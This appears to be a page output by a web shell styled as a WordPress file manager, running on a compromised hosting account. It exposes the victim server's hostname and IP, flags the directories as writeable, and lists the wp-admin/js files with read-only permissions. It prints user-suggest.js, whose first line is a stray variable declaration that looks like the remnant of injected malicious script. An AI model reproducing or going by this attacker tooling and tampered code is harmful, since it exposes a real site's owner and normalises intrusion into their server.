$67 GRAYBYTE WORDPRESS FILE MANAGER $75

SERVER : vnpttt-amd7f72-h1.vietnix.vn #1 SMP Fri May 24 12:42:50 UTC 2024
SERVER IP : 103.200.23.149 | ADMIN IP 216.73.216.22
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : NONE

/home/bqrcodec/.trash/wp-admin/js/

HOME
Current File : /home/bqrcodec/.trash/wp-admin/js//user-suggest.js
var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;/**
 * Suggests users in a multisite environment.
 *
 * For input fields where the admin can select a user based on email or
 * username, this script shows an autocompletion menu for these inputs. Should
 * only be used in a multisite environment. Only users in the currently active
 * site are shown.
 *
 * @since 3.4.0
 * @output wp-admin/js/user-suggest.js
 */

/* global ajaxurl, current_site_id, isRtl */

(function( $ ) {
	var id = ( typeof current_site_id !== 'undefined' ) ? '&site_id=' + current_site_id : '';
	$( function() {
		var position = { offset: '0, -1' };
		if ( typeof isRtl !== 'undefined' && isRtl ) {
			position.my = 'right top';
			position.at = 'right bottom';
		}

		/**
		 * Adds an autocomplete function to input fields marked with the class
		 * 'wp-suggest-user'.
		 *
		 * A minimum of two characters is required to trigger the suggestions. The
		 * autocompletion menu is shown at the left bottom of the input field. On
		 * RTL installations, it is shown at the right top. Adds the class 'open' to
		 * the input field when the autocompletion menu is shown.
		 *
		 * Does a backend call to retrieve the users.
		 *
		 * Optional data-attributes:
		 * - data-autocomplete-type (add, search)
		 *   The action that is going to be performed: search for existing users
		 *   or add a new one. Default: add
		 * - data-autocomplete-field (user_login, user_email)
		 *   The field that is returned as the value for the suggestion.
		 *   Default: user_login
		 *
		 * @see wp-admin/includes/admin-actions.php:wp_ajax_autocomplete_user()
		 */
		$( '.wp-suggest-user' ).each( function(){
			var $this = $( this ),
				autocompleteType = ( typeof $this.data( 'autocompleteType' ) !== 'undefined' ) ? $this.data( 'autocompleteType' ) : 'add',
				autocompleteField = ( typeof $this.data( 'autocompleteField' ) !== 'undefined' ) ? $this.data( 'autocompleteField' ) : 'user_login';

			$this.autocomplete({
				source:    ajaxurl + '?action=autocomplete-user&autocomplete_type=' + autocompleteType + '&autocomplete_field=' + autocompleteField + id,
				delay:     500,
				minLength: 2,
				position:  position,
				open: function() {
					$( this ).addClass( 'open' );
				},
				close: function() {
					$( this ).removeClass( 'open' );
				}
			});
		});
	});
})( jQuery );

Current_dir [ WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
18 Mar 2026 5.50 AM
bqrcodec / bqrcodec
0755
widgets
--
27 Jan 2024 2.08 PM
bqrcodec / bqrcodec
0755
wp-site
--
18 Mar 2026 5.50 AM
bqrcodec / bqrcodec
0755
code-editor.js
11.392 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
code-editor.min.js
3.086 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
color-picker.js
9.614 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
color-picker.min.js
3.479 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
comment.js
2.919 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
comment.min.js
1.359 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
custom-header.js
2.051 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
customize-controls.js
286.537 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
customize-controls.min.js
109.047 KB
21 Apr 2024 5.31 PM
bqrcodec / bqrcodec
0444
customize-nav-menus.js
105.983 KB
21 Apr 2024 5.18 PM
bqrcodec / bqrcodec
0444
customize-nav-menus.min.js
44.598 KB
21 Apr 2024 5.37 PM
bqrcodec / bqrcodec
0444
customize-widgets.js
70.099 KB
21 Apr 2024 5.33 PM
bqrcodec / bqrcodec
0444
customize-widgets.min.js
27.474 KB
21 Apr 2024 5.18 PM
bqrcodec / bqrcodec
0444
edit-comments.js
36.726 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
edit-comments.min.js
15.064 KB
21 Apr 2024 5.14 PM
bqrcodec / bqrcodec
0444
editor-expand.js
41.684 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
editor-expand.min.js
13.211 KB
21 Apr 2024 5.27 PM
bqrcodec / bqrcodec
0444
editor.js
44.329 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
editor.min.js
12.941 KB
21 Apr 2024 5.41 PM
bqrcodec / bqrcodec
0444
gallery.js
5.488 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
gallery.min.js
3.729 KB
21 Apr 2024 5.12 PM
bqrcodec / bqrcodec
0444
image-edit.js
38.28 KB
21 Apr 2024 5.40 PM
bqrcodec / bqrcodec
0444
image-edit.min.js
14.371 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
inline-edit-post.js
17.827 KB
21 Apr 2024 5.33 PM
bqrcodec / bqrcodec
0444
inline-edit-post.min.js
8.299 KB
24 Mar 2024 3.43 PM
bqrcodec / bqrcodec
0444
inline-edit-tax.js
7.689 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
inline-edit-tax.min.js
3.002 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
language-chooser.js
0.944 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
language-chooser.min.js
0.488 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
media-gallery.js
1.348 KB
21 Apr 2024 5.17 PM
bqrcodec / bqrcodec
0444
media-gallery.min.js
0.672 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
media-upload.js
3.459 KB
21 Apr 2024 5.34 PM
bqrcodec / bqrcodec
0444
media-upload.min.js
1.2 KB
21 Apr 2024 5.22 PM
bqrcodec / bqrcodec
0444
media.js
6.465 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
media.min.js
2.435 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
nav-menu.js
50.164 KB
21 Apr 2024 5.37 PM
bqrcodec / bqrcodec
0444
nav-menu.min.js
25.424 KB
21 Apr 2024 5.29 PM
bqrcodec / bqrcodec
0444
password-strength-meter.js
4.212 KB
21 Apr 2024 5.13 PM
bqrcodec / bqrcodec
0444
password-strength-meter.min.js
1.172 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
password-toggle.js
1.383 KB
21 Apr 2024 5.22 PM
bqrcodec / bqrcodec
0444
password-toggle.min.js
0.902 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
revisions.js
33.2 KB
21 Apr 2024 5.30 PM
bqrcodec / bqrcodec
0444
revisions.min.js
17.523 KB
21 Apr 2024 5.26 PM
bqrcodec / bqrcodec
0444
set-post-thumbnail.js
0.931 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
set-post-thumbnail.min.js
0.681 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
site-health.js
13.351 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
site-health.min.js
6.229 KB
21 Apr 2024 5.21 PM
bqrcodec / bqrcodec
0444
svg-painter.js
5.468 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
svg-painter.min.js
2.407 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
tags-suggest.js
5.607 KB
21 Apr 2024 5.14 PM
bqrcodec / bqrcodec
0444
tags-suggest.min.js
2.268 KB
21 Apr 2024 5.26 PM
bqrcodec / bqrcodec
0444
theme-plugin-editor.js
24.866 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
theme-plugin-editor.min.js
11.535 KB
24 Mar 2024 3.39 PM
bqrcodec / bqrcodec
0444
theme.js
54.745 KB
21 Apr 2024 5.36 PM
bqrcodec / bqrcodec
0444
theme.min.js
26.496 KB
21 Apr 2024 5.37 PM
bqrcodec / bqrcodec
0444
updates.js
93.352 KB
21 Apr 2024 5.40 PM
bqrcodec / bqrcodec
0444
updates.min.js
40.72 KB
24 Mar 2024 3.41 PM
bqrcodec / bqrcodec
0444
user-profile.js
13.854 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444
user-profile.min.js
6.204 KB
21 Apr 2024 5.13 PM
bqrcodec / bqrcodec
0444
user-suggest.js
2.322 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
user-suggest.min.js
0.735 KB
24 Mar 2024 3.40 PM
bqrcodec / bqrcodec
0444
widgets.js
22.632 KB
24 Mar 2024 3.43 PM
bqrcodec / bqrcodec
0444
widgets.min.js
12.389 KB
24 Mar 2024 3.42 PM
bqrcodec / bqrcodec
0444

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF